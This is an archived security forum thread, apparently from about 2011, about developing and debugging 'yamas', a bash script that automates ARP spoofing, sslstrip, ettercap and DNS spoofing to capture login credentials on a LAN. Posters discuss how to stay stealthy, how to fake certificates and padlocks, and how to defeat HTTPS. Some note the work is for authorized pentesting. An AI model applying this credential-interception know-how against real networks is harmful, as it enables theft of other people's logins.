All you need to do is run dos2unix from the command prompt in BT. It should be fine after that.

zimmaro
07-12-2011, 08:44 PM
hi, ericmilam
many thanks, I was not aware of dos2unix, now works!:)
I always thought to be a goat !!!:):)

ericmilam
07-12-2011, 08:52 PM
No problem.

Whenever you see that error...that's all you should have to do...

DOS & RTF type documents append a bunch of hidden items.

comaX
07-13-2011, 06:40 PM
All you need to do is run dos2unix from the command prompt in BT. It should be fine after that.
Thanks for the help ! That's weird though, I'll look into that.

In next version 0.9.2 or maybe 0.9.3 (kinda lost track to be honest... I know I have a 0.9.2 in my files, but don't if this was test or new stuff :s) I'll add an option so that the script doesn't check for updates, and hopefully soon enough, DNS spoofing. But I don't have much time these days, so I'll do what I can ^^

Cheers !

ericmilam
07-13-2011, 06:54 PM
Thanks for the help ! That's weird though, I'll look into that.

Are you doing your work in Windows Word Pad or Mac's Text Edit? If so that'll do it.

With regards to losing track. I totally understand...seems I lose steam as well.

Best Regards,
Eric

comaX
07-14-2011, 09:13 AM
Are you doing your work in Windows Word Pad or Mac's Text Edit? If so that'll do it.

With regards to losing track. I totally understand...seems I lose steam as well.

Best Regards,
Eric

When I have some quick edit to do, I sometimes use Kedit in win7 but so far there never was a problem... Don't know what happened ! Anyway, that's now fixed. I also added an argument (-n) so that the script doesn't check for updates at startup. That was requested by mail, and I can understand why one wouldn't want to update or even check for them. Since it was quick and easy, I just did it !

ericmilam
07-14-2011, 04:13 PM
That was requested by mail, and I can understand why one wouldn't want to update or even check for them. Since it was quick and easy, I just did it !

Funny how what we, as the code writer, think is important versus the feedback from the users. I always find it odd. I always thought the sslstrip parser would knock people socks off, but they don't seem to care. Weird to me...probably because it saved me hours and hours of going through sslstrip dumps for accounts...

Oh well!

Happy hunting....

comaX
07-15-2011, 12:03 PM
Ahah, that's true !

By the way, my new website is up and running (and not finished at all, but who gives a f...). So the script is updated too so that it retrieves informations from the new website !

Update your scripts !
Oh, and you will now have to launch it with "yamas" instead of "mitm" !

killadaninja
07-15-2011, 05:36 PM
Grepping and parsing data to/from a dyanamic file using sh, NOT A GREAT IDEA but it can be done. Ill have a look into it.

michelinok
07-15-2011, 05:53 PM
Still here?

http://comax.pagesperso-orange.fr/mitm.sh

or changed?

comaX
07-15-2011, 06:04 PM
Still there, but migrating to comax.fr Don't worry, the script should do that alone, you won't notify anything. You'll just have to call it with "yamas" instead of "mitm" ;)

Killadaninja : yup, but since it was a bash script, I did it with bash, and I must say I'm pretty happy with the result. I just have to find a way to not make it parse the whole stuff everytime, because when the file gets large, it gets CPU consuming... Tail could be an option, but I remeber I discarded it for some reason when I was working on it !

killadaninja
07-16-2011, 06:19 AM
Excuse my ignorance ComaX, I did not realise you had incorperated it into your script I thought you was having a problem doing so, hence why I said I would have a look. So what exactly is your problem?

michelinok
07-16-2011, 07:02 AM
No way to have ettercap (as an option of course!!!) to parse the traffic?

NightDream
07-17-2011, 11:14 AM
I deleted mitm in /usr/bin and download again the recent yamas.sh
Now working fine

Thanks for the script!

cheers

comaX
07-17-2011, 07:35 PM
Excuse my ignorance ComaX, I did not realise you had incorperated it into your script I thought you was having a problem doing so, hence why I said I would have a look. So what exactly is your problem?

Hmm well, right now I don't think I have any ! I did have problems, but I believe I solved them all ! If I could, I would just like to make it less CPU-consuming ! Thanks for your interest though ;)

@Michelinok : I don't know how this works, but I'm pretty sure it will need a pcap file. And that would defeat the sole purpose of the parser I worked my as* off to do :p
I'll have a look into it though. After all, my parser is for sslstrip, not for pcap, so why not...

ericmilam
07-18-2011, 09:13 PM
I created a more "fluid" way to check for sslstrip version. I notice you hardcoded your version numbers.

this may help...works ok for now and should in the future as well.

http://pastebin.com/j8qJ6LQt

JB

comaX
07-19-2011, 10:08 AM
Pretty nice, but that is pretty much hard-coded too :

printf "\nDownloading the tar file...\n"
cd /tmp
wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
sleep 2

The link is provided on the page so, parsing it to store it to a variable and then wget -q $var would do the trick ;)

ericmilam
07-19-2011, 04:22 PM
Doh! I totally missed that one. Thanks for the heads up. Can fix it like this: wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-$latestver.tar.gz

Hopefully he always saves it as a .tar.gz file...

Thanks
JB

comaX
07-20-2011, 11:04 AM
I think he does, since at least 0.6 if I remember correctly !

Taurin
07-25-2011, 10:11 AM
Hi comaX,

I'm using BT5 (KDE32, installed) and have tried several things to get MITM Scripts running. Without using SSLstrip ettercap works fine for me, but my attempts to capture HTTPS traffic mainly failed. I've tested yamas and must say, that it seems to work properly. Thanks for your great work.

But I've discovered some problems, too. While surfing on social networks (like fb) the pass window keeps on repeating website, login (the id-nr.) and wrong captured entries as passwords. When I tried to select one, or two victims, the whole network was still logged. While three machines where running, yamas crashed often around ~30 minutes of usage. I've got colored stripes on the screen and couldn't see anything till hard-reboot. E-Mail clients where not logged, also several pages (like this board) where not detected properly. "Location: ht" seems to be a kind of ssltrip-bug, which sucks while surfing. ettercap worked fine for showing up captured details, maybe you could integrate an option to choose ettercap instead.

What I liked the most about yamas, is the cleaning function at the beginning and out of that it's always running (stable) the same way and these security alerts never showed up, because sslstrip seems to run correctly.

Kind regards

comaX
07-29-2011, 06:14 PM
Hi ! Thanks for the feedback (nice avatar btw =D )! I never experiences anything like you say unfortunately, so I don't really know what to do there...
Location: ht is indeed an sslstrip error, nothing I can do about that ! Did you use yamas -e or just yamas ?

By the way, I did a little "article" about how to mitigate that kind of attack. Nothing too fancy or too savvy, but it's a good start I think. You can check it out at http://comax.fr/yamas.php?frame=protect.php and then click the "how to protect yourself" link !

Cheers !

ericmilam
07-29-2011, 07:59 PM
@Taurin - You have to remember that if SSLStrip intercepts the traffic, it is no longer 443 traffic, so you will not see it in ettercap. In addition, all port 80 traffic forwards to 10000 in SSLStrip, so again ettercap won't see it. So it is working as expected, you WON'T see it in ettercap and will have to go through the SSLStrip Logs.

One thing you may be able to do is to add port 10000 to the etter.conf file as http traffic. Then you may begin seeing the traffic in ettercap. I believe that would work, but haven't tested it.

Happy hunting...

snafu777
07-31-2011, 04:49 PM
comaX,

Okay, here is the edit I told you about. Anywhere you see a *** will indiciate changes and such


comaX,
Hello there... I've some ideas for your script that ye might include. Some of the ideas are from my own current scripts that I use for day to day testing and some of them are based off things I've seen in your 'bashing'. I must say, I like some of what you've done with your 'bashing' (So many different ways to do the same thing, whatever is more efficient is the way to go, so I've been taught and believe and teach back) so I'll be incorporating that style into my own script. Now, that is of course if its okay with you Sir. I shall give credit where it's due if you would allow me.

Let's tear into this thing shall we?

Tabbing...It's what makes a script really readable to the end user. As well, it's incorporated into python (<3 the snake)....
Take for instance this part of your fast_cleanup function:
if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
killall ettercap
else
killall arpspoof
fiWe can make it more readable via this (As well, if you ever choose to port it to python or another "tab" required language, some of the work is already done for ya):
if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
killall ettercap
else
killall arpspoof
fiI used a standard two spaces with the indent....I can't use tab here without editing in a word doc....Use whatever method suits ya =)
Every character counts
if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filenameYou could change that up a bit and have less characters via:

if [ $1 = "-p" -o $1 = "--parse" ]; then #parse a given filenamesince $1 would only be -p or --parse, there is no need to quote it (i.e. There are no spaces within the value of $1; preventing any need for quotations)
My rhyme and reasoning aside from the conservation of total characters within the script ---> To Double Bracket, or Not to Double Bracket. That is the Question We Must Ask Ourselves (http://tldp.org/LDP/abs/html/abs-guide.html#DBLBRACKETS)


***Mistake 1*** I was writing some script just two days ago, and I came across an issue, something about unary operator expected. So I did the right thing, I researched.... Turns out the quotes aren't a bad idea after all. I can't explain it nearly as well as the webpage does so here is the link explaining why I was wrong, and you were right regarding quote usage http://linuxcommand.org/wss0100.php As well, your use of double brackets might not be too bad of an idea either....while my script example I don't have with me, I know that to implore a quick fix, I did the double bracket around the test (figured maybe you had the right idea with the double brackets....and yep........it prevented the unary error. I am wondering though if by doing quotes I could have prevented it....That might be confusing....and since I can't write script and test right now (windows box)...Here is my example to test the [[ and "" thing
#!/bin/bash

number=

if [[ $number = "1" ]]; then
echo "Number equals 1"
else
echo "Number does not equal 1"
fiTheir solution was to enclose $number within quotes...."$number" ....My guess was to enclose it in brackets like I did in the above example. I will test this as soon as I get home and report back. I'm betting that by running the above script, you don't get any errors....We shall see..Outside of the LAN Issues
This one is a stretch....but...I cannot stress this enough......Any PenTester worth his salt must "Think Outside the Box"
### Message of the day ! <= ****ing useless, but who knows, I might
want to warn about something directly, or tell a joke...
wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message fileIf I used your script in a corporate environment, it would draw unneeded attention (i.e. You're doing a PenTest on a big corporation and they see that some user is connecting <or trying to connect> to a "non-whitelisted" IP/HTTP/Whatever connection, it might get logged, and then alert them to your presence.) IMHO, remove any unneeded connections to the outside world from your script comaX. As far as the lines of script that "MUST" communicate with the outside world, i.e. grepcred.txt.....throw in an option that allows the user to choose whether or not they wish to send packets outside of the LAN, don't do it for them. At a minimum, throw in the option that if they don't specify for instance $2 regarding the grepcred --parse option....Or AutoUpdating...That type of thing....that there will be a pause prior to the grabbing of the file (thereby allowing them to stop the script, lest it connect)....Menu Options
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse
elif [ "$rtp" = "3" ] ; then
echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse
elif [ "$rtp" = "4" ] ; then
echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh &
looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse
elif [ "$rtp" = "5" ] ; then
echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #was
"mother****er" during my tests.
rtparse
fi
}Let's clean this up via case:

***I changed this to actually work...My statements were incorrect in the previous version of this post***
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh &
looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}

***Mistake 2***
Change from 5) down to read

5) echo "Previous"
final;; ## must have the ;; to go to the next statement, not sure if statement is the word, but u know what i mean......
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =) ## the * indicates your else part of the if statement..ie...choices are 1-5...anything that is not equal to 1 - 5....invokes the else
rtparse;;
esac
}



Learning Curve
As I stated above, I have seem some neat things in your script that I want to incorporate into my own.

1) I am posting from a windows box right now, so I can't experiment and figure it out on my own (yes google...but...Believe it or not, there are a lot of websites I'm blocked from where I am currently at..The websites where I could learn certain syntax usage specifically....Amazingly enuf...this website isn't blocked....blows my mind, but whatever....It allows me to contribute and learn just by being here....)

2) I think I know what they do by looking at them, and would like you to clarify for me, Please... =)
I took these snippets from the original code for the topic directly above this one, for ease of use, I will not use my modified case here....Leaving your original code in tact...
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}Question 1) Why enclose $loopparseid inside curly braces? What function, if any does that serve?
Question 2) kill -19 and kill -18. Does that pause and resume ANY program?? If so, wow...Just learned something EXTREMLY useful....
Alright, welp...That about wraps that. There are some other things I noticed, but I will see if I get any response to my above ideas. Take a look at it, and if you like what I did and are hungry for more, let me know. Always happy to help.


V/r,
Snafu
Pffbt..
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass..

comaX
08-03-2011, 03:17 PM
Yay ! Thank you very much !

So, I'll try not to forget anything, tell me if I do ;)

Tabbing. You sir are very right. I try to do that, but sometimes I just get lost and give that up as long as it does what I want. I should really take the time to clean it up though.

Chars count : again, you're right, but since there are comments everywhere and all, I didn't pay much attention to that. As for the double brackets, I used to use only one but it gave me some bugs at some places, so I decided every if statement would have double brackets and quotes. That's not very serious, but I learnt scripting as I scripted so I didn't bother much as long as it worked. Now that I know a bit more, I should include that in a clean up, sure.

Outside of the lan. I updated the script two days ago with a new -s switch (for silent) to prevent the script from requestiong anything. Too bad I didn't see your post earlier ! By the way, one should have the needed files before launching the script then. And, it makes me think I might have forgotten something. Damn. Edit : I did forgot something. It's now fixed !

Menu options. I used case but for some reason removed them? I can't remember why. If the posted version works, I'll cook a good copypasta though ! Thanks :)Edit : works with that, but you forgot to put *) for the last case.

rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh &
looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}/Edit

"Stealing" my work ? :p Please do as you please good sir ! You're even welcomed to do so, it's an honour !

Regarding question 1 : this was something I found in someone else's script when I didn't know anything about that. I now feel very dumb for not asking myself this question... Best way to get an answer is to try it ! So that's what I'll do ! Edit : just tried, they were useless.

Question 2 : I believe it does. If I remember the man pages for kill, it stated that it suspended a process execution. I'll edit with the relevant part of the man when I find it.

Thank you very much for such a feedback, that's exactly what I need, want and like ! If you have more, please do report !

th3hate
08-10-2011, 03:43 PM
Is it possible to run this script in bt5 vmware? To my information vmware doesn't recognize wlan0 unless using an external wifi card.

Using bridged mode only captures stuff from the pc you're working on.

2WIRE057
08-12-2011, 08:55 PM
Is it possible to run this script in bt5 vmware? To my information vmware doesn't recognize wlan0 unless using an external wifi card.

Using bridged mode only captures stuff from the pc you're working on.

Yes. You must be using a USB wifi adapter.

comaX
08-13-2011, 09:24 AM
That sounds about right ! So just plug an USB adapter, connect it to the VMware, and I think it will be ok !

comaX
08-25-2011, 11:00 PM
Hi guys ! I added DNS spoofing, and even though I think I didn't make any mistake since it works, it's very buggy and will work one time in four...
So, any help would be appreciated ! If you think it's better to start a new thread, I'll do !

Meanwhile, you can grab the last version there : http://comax.fr/yamas.php

Btw, a friend from maemo's forums did a very good demo video, you should check it out !

ericmilam
08-25-2011, 11:06 PM
Have you check SSLStrip since the BT5r1 update. It's not playing nice with ettercap and I wanted to see if your script is ok. I get nothing but L3 errors when SSLStrip is fired up with ettercap. I haven't narrowed it down, but everything was cool in BT5, only the kernel changed.

Best Regards,
JB

comaX
08-25-2011, 11:43 PM
Have you check SSLStrip since the BT5r1 update. It's not playing nice with ettercap and I wanted to see if your script is ok. I get nothing but L3 errors when SSLStrip is fired up with ettercap. I haven't narrowed it down, but everything was cool in BT5, only the kernel changed.

Best Regards,
JB

Nope, I only tried with arpspoof, and everything's alright ! I'll try with ettercap and report back.

Any idea regarding dns spoofing issues ? I'm using dnsspoof by the way.

Cheers !

Carnacior
08-26-2011, 05:02 AM
+1 for the L3 errors with SSLstrip...

comaX
08-26-2011, 11:34 AM
After a quick try on different sites, I didn't get any error. I believe to be fully up to date since I updated just a few days ago with

apt-get update
apt-get upgrade
apt-get dist-upgrade

I didn't get 5r1 from the image, as you understood.

Edit : I just tried all those commands again, and I was in deed fully up to date !

Edit 2 : DNS spoofing with ettercap seems steadier than with dnsspoof. Both are available form the script though. Waitin for some feedback ;)

Julius
08-31-2011, 12:47 AM
Hello very very very thanks for you project I see this with more option : http://code.google.com/p/e asy-creds/ (http://code.google.com/p/easy-creds/)and Mod Edit: No links which require registration. Can you include more option in your future release please :-)


thanks a lot

tuxnator
09-09-2011, 07:55 PM
Hi comaX,

Firstly, I would like to congratulate you for the very good work with this script. :D

Secondly, and whether you allow me to say, until version 0.9 there is no need to use wget in this script. The idea of self-update doesn't sound good. You should use a repository, instead. However, worst is the idea of downloading and injecting code in the script on the fly. This is a great security flaw. :rolleyes:

Concluding, try to use more the function feature, it'll make your code clearer, less repetitive, easier and safer to be maintained.

VulpiArgenti
09-11-2011, 05:32 AM
Hi comaX,

You might be pleased to know there is someone out here using your script to learn bash. The heavy commenting is very helpful.

I notice a small problem running nmap. On my set-up, I get these results:


root@bt:~# ip route show
default via 192.168.0.254 dev wlan0
192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.102

root@bt:~# ip route show | awk '(NR == 1) { print $1}'
default

Therefore the value "default" is passed to nmap, stopping the script. Not sure if other people have this problem, but the fix for me is to change line 332 to:


search=$(ip route show | awk '(NR == 2) { print $1}')

Regards
Vulpi

comaX
09-11-2011, 05:37 AM
Please do ! Regarding security issues, I'm the only one uploading anything, and anyone's free to look at the code before executing it. And I have no interest whatsoever in modifying the code to do some 3v17 haXXor stuff. Yet, I understand your concern ! If I could use some repo I would, but I never bothered trying to be honest... That could be very nice though. About making the code clearer, be my guest ! I've been meaning to do that for a while, but I keep running out of time, or adding new stuff and thinking I'll clean later, when I believe I won't add anything else.

For instance, the whole part concerning sslstrip may now be useless. I just put that regarding migration to BT5, but now it has been a while and I don't think it's necessary anymore.

Don't hesitate to mail, I'd be glad to work on it with you !

ShadowMaster
09-20-2011, 12:00 AM
First, amazing script, really cool. Second, when I ran it with arpspoof, the captured password was missing a letter. When I ran it with ettercap, the captured password was fine. Is this an issue with the realtime parsing? Just curious. Also, is there anyway to have the script use ettercap's fake ssl and padlock option as opposed to sslstrip?

comaX
09-20-2011, 09:17 AM
That missing letter stuff never happened to me, maybe you made a typo while testing ?
As for the script using fake ssl, why not ! I'll dig into that and see what I can do, if I like it ;)

ShadowMaster
09-20-2011, 12:03 PM
That missing letter stuff never happened to me, maybe you made a typo while testing ?
As for the script using fake ssl, why not ! I'll dig into that and see what I can do, if I like it ;)
Um. as I logged in to the account, not sure how I could have made a typo... not important I'll trouble shoot it again. As for the fake ssl, what I imagine is the user typing in 'yamas' and being presented with the same options as before, just instead of automatically defaulting to arpspoof, he chooses between arpspoof and ettercap, with the default being arpspoof. And if he chooses ettercap, let him choose if he wants to add both the Fake SSL option and the Fake padlock option. Thanks. looking forward to a great update to an already great script.

destro23
10-07-2011, 01:39 PM
Hi comaX,

You might be pleased to know there is someone out here using your script to learn bash. The heavy commenting is very helpful.

I notice a small problem running nmap. On my set-up, I get these results:


root@bt:~# ip route show
default via 192.168.0.254 dev wlan0
192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.102

root@bt:~# ip route show | awk '(NR == 1) { print $1}'
default

Therefore the value "default" is passed to nmap, stopping the script. Not sure if other people have this problem, but the fix for me is to change line 332 to:


search=$(ip route show | awk '(NR == 2) { print $1}')

Regards
Vulpi


what kernel are you running? type "uname -a" that may have something to do with it.

with .38 and .39 i think it gives different format... maybe thats why. I remember trying the same command on 2 different VM's BT5 and BT5R1 and they were a little different. Looks like comaX is running .39

comaX
10-07-2011, 08:53 PM
^ Yup, always up to date fellas !
The lines were inverted between BT5 and BT5r1.

JUUJUU
10-27-2011, 02:40 PM
great scrip comaX. i use it on BT 5r1 and it work perfect.
i have few questions. have anybody (or you) try it on LAN network? and how to edit log file yamas.txt so it can see only pages visited with while sniffing?

comaX
10-27-2011, 05:07 PM
Hmm, by definition, you run it on a lan network... Did you mean WAN ? (in that case, that's a no-go)

And I didn't get that part
how to edit log file yamas.txt so it can see only pages visited with while sniffing?
What did you mean ?

Thanks for your interest !

JUUJUU
10-27-2011, 06:24 PM
i mean on local area network like it on school,office building...(more than 10 computers connected in lan).
after sniffing script asks if i wont to keep the whole log file for further use. well how can i use that file further? for example i wont see only pages visited not all other lines like "server header" and blab blab bb....

comaX
10-28-2011, 12:20 PM
It will work on any LAN network, let it be home, professional or highschool. But if you're not authorized to do so, don't do it, it's illegal and I won't be responsible for whatever it is that you do.

"for further use" means that my script will only show you credentials, but there are a lot of stuff in the logs that could be useful... It's up to you to know what you want, and what can be found.

And yes you will have a lot of junk in those files, but with a little experience, you'll easily browse through it.

comr4de
11-02-2011, 11:20 PM
i just watched the youtube , this looks like a realy nice auto script
i really enjoyed the youtube video
==
i have a problem running it
i am using BT5r1 and i installed yamas successfully
i ran it with the default inputs
BTW ,i am on mikrotik Lan
every time i ran it i got this error meesage in the passwords console

" egrep: invalid back refrence "

and that's not it , immediatly after i got that error , i got disconnected from the mikrotik server and i have been asked to login to MT again

any ideas ?

JUUJUU
11-04-2011, 01:15 PM
It will work on any LAN network, let it be home, professional or highschool. But if you're not authorized to do so, don't do it, it's illegal and I won't be responsible for whatever it is that you do.

"for further use" means that my script will only show you credentials, but there are a lot of stuff in the logs that could be useful... It's up to you to know what you want, and what can be found.

And yes you will have a lot of junk in those files, but with a little experience, you'll easily browse through it.

ok, thanks for fast replay. dont worry it wont be use in any illegal activity :cool:

AnimusDomini
11-21-2011, 04:49 PM
Hello comaX,

First of all, thanks for sharing your script... I was testing it and noticed the victims can't play youtube while the script is running. I tested with Chrome and Safari with the same results. The videos seems to be loading but doesn't load and so, doesn't play. The script works great, but the stealth factor starts to fail when the victims guess something is weird. Is there a fix for it? Thanks in advanced.

khaos
11-23-2011, 05:50 PM
Nice script. It works in my BT5R1 KDE 32 like a charm. I have some problems in ssl, cause I can't get passwords from SSL sites.
Maybe it's my problem I don't know. The settings seems to be ok

@JUUJUU: If you want to see what sites the clients visit try: urlsnarf -i wlan0 (In wlan0 enter your interface, e.g. eth0, wlan0, wlan1 etc)

ShadowMaster
11-23-2011, 06:49 PM
Nice script. It works in my BT5R1 KDE 32 like a charm. I have some problems in ssl, cause I can't get passwords from SSL sites.
Maybe it's my problem I don't know. The settings seems to be ok
Are you sure you're not logging on in the test case in https://... If you are then being the MiTM won't help, because all traffic is encrypted anyway. You need to make sure SSlStrip is taking away the HTTPS and making it HTTP only. If it's not, then try using the ettercap option and spoofing the ssl connection. Although that might take some social engineering to work in the wild... If the options that I suggested to ComaX (Allowing user input for the decision of either fake ssl, sslstrip, padlock icon, fake certificate etc...) get put in place, then it'll be easier. But until then good luck.

comaX
11-24-2011, 11:29 AM
If the options that I suggested to ComaX (Allowing user input for the decision of either fake ssl, sslstrip, padlock icon, fake certificate etc...) get put in place
Damn, I forgot about those. Sorry.
It's been a while I didn't write anything new.
About the padlock icon, don't you think it's better to leave it the way it is ? Do you think some people might not want it ? If so, I will make that an option.
I'll try to work on the other stuff you mentioned to, if I have the time.

Cheers !

ShadowMaster
11-24-2011, 10:44 PM
I think that the initiation of the script should look like this
./yamas
(a)rpspoof or (e)ttercap?
if a then keep all the defaults the way they are

if e then
do you want to (s)trip the ssl connection or to s(p)oof it?
if s then keep defaults and do you want to add the (p)adlock icon in the users browser?

if p then
do you want to use a fake certificate or not?Y/n?

the flow of this will allow the user to define all his own options and still provide the functionality of the other options to those who want them. Let me know. Thanks. Still looking forward to the update. :D

ShadowMaster
11-24-2011, 10:45 PM
AHH double post sorry!! Screwed up browser on a slow computer....

comaX
11-25-2011, 07:01 PM
(a)rpspoof or (e)ttercap?
if a then keep all the defaults the way they are

if e then
do you want to (s)trip the ssl connection or to s(p)oof it?
if s then keep defaults and do you want to add the (p)adlock icon in the users browser?

if p then
do you want to use a fake certificate or not?Y/n?

the flow of this will allow the user to define all his own options and still provide the functionality of the other options to those who want them. Let me know. Thanks. Still looking forward to the update.

I'll leave the ettercap option as a parameter passed to the script, but I think I'll use this kind of menu, it's a good idea ! By the way, if you have an idea of how to script this, you can submit it to me and you'll get the proper credits ;)

My main problem is that I never much used ettercap for the ssl stuff because I think it's bad SE, but surely I understand why someone would want that, so it makes sense to add it.

Cheers

Btw, is it me or is the site going really slow those last couple of weeks ?

ShadowMaster
11-25-2011, 07:42 PM
I'll leave the ettercap option as a parameter passed to the script, but I think I'll use this kind of menu, it's a good idea ! By the way, if you have an idea of how to script this, you can submit it to me and you'll get the proper credits ;)

My main problem is that I never much used ettercap for the ssl stuff because I think it's bad SE, but surely I understand why someone would want that, so it makes sense to add it.

Cheers

Btw, is it me or is the site going really slow those last couple of weeks ?

It might be just the two of us, its been sluggish for me as well. :p

So. The "new" flow looks like this.
./yamas - same old, same old.
./yamas -e
Do you want.... (all the previous menu options.)

BTW, I'm not sure what you mean Bad SE?
Any way, I've never really scripted anything in bash, but I've got years of experience with c and .net, so it might be ported. That being said, if I knew what I was doing in bash, I would write it like so:
All vars would be booleans

var=(strip or spoof?)
if strip then var1=(padlock?)
if var1 then
run command w/ padlock, exit function/loop
if not var1 then
run command w/o padlock, exit function/loop

if spoof then var1=(add cert?)
if var1 then
run command w/ cert, exit function/loop
if not var1 then
run command w/o cert, exit function/loop


This psuedocode could be ported to bash fairly easily, I just don't know how... But I leave that to the experts like you.:D
Let me know. Thanks.

comaX
11-25-2011, 09:14 PM
I wouldn't call myself an expert at all, but thanks ! I guess I'll have to do some reading on ettercap's functionnalities.
By "bad SE", I mean that any decent browser these days would say "bad cert, don't go there", I can't imagine someone thinking "You know what browser ? F*ck you, imma going' there !"

I guess I still want to believe in humanity after all :p

EDIT :
I came across a MAJOR problem while working on this... Unless I understood something the wrong way, you either spoof ssl connection with ettercap's fakessl (which includes fakecert), and you WILL have https etc or you use sslstrip to get rid of the ssl.

But you can't do both at the same time.

So including fakessl would mean disable sslstrip, which will mean that the password parsing won't work, which pretty much defeats the whole goal of the script.

Correct me if I'm wrong !

Meanwhile, I'll keep digging.

EDIT :
@AnimusDomini
Hello comaX,

First of all, thanks for sharing your script... I was testing it and noticed the victims can't play youtube while the script is running. I tested with Chrome and Safari with the same results. The videos seems to be loading but doesn't load and so, doesn't play. The script works great, but the stealth factor starts to fail when the victims guess something is weird. Is there a fix for it? Thanks in advanced.

I believe, it was posted retroactively... So, as I told you, I never experienced such a thing, but it would make sense if the videos were slow to load. I'll ask people to provide feedback in the "message of the day" in the script, hoping people actually read it ^^

khaos
11-27-2011, 12:42 AM
Are you sure you're not logging on in the test case in https://... If you are then being the MiTM won't help, because all traffic is encrypted anyway. You need to make sure SSlStrip is taking away the HTTPS and making it HTTP only. If it's not, then try using the ettercap option and spoofing the ssl connection. Although that might take some social engineering to work in the wild... If the options that I suggested to ComaX (Allowing user input for the decision of either fake ssl, sslstrip, padlock icon, fake certificate etc...) get put in place, then it'll be easier. But until then good luck.

thanks for your reply but I didnt understand what you mean. I have run yamas and when I tried to login in my test pc ("victim") in gmail via: https://gmail.com doens't strip the ssl.

Maybe I have not understand how sslstrip works. I think that sslstrip removes the ssl and the site will be http://gmail.com and not givint a fake ssl certificate to the victim (as cain and abel). So what I have wrong?

ShadowMaster
11-27-2011, 01:08 AM
@ComaX If the FakeSSL is active, all packets forwarded THROUGH you would be decrypted. Also, people clicking through the warnings happens way more often than is comforting.

@khaos What browser are you using? Some browsers (Chrome...) do not allow non-ssl connections to certain sites.

ShadowMaster
11-27-2011, 01:15 AM
Why has this site been so screwy lately? Mods please delete...

comaX
11-27-2011, 02:57 AM
Maybe I have not understand how sslstrip works. I think that sslstrip removes the ssl and the site will be http://gmail.com and not givint a fake ssl certificate to the victim (as cain and abel). So what I have wrong?

what did you type in to get to the site ?
If you typed https://... then sslstrip can't do anything. Now if you only typed "gmail.com", then refer tio ShadowMaster's post : in deed chrome will kinda force you to the secrured version.


If the FakeSSL is active, all packets forwarded THROUGH you would be decrypted. Also, people clicking through the warnings happens way more often than is comforting.
That's a damn shame for "standard users"... But anyway, it does mean that both sslstrip and ssl dissecting can't be run at the same time, right ? Again, I'm only assuming since I haven't had the chance to test it myself yet

ShadowMaster
11-27-2011, 03:16 AM
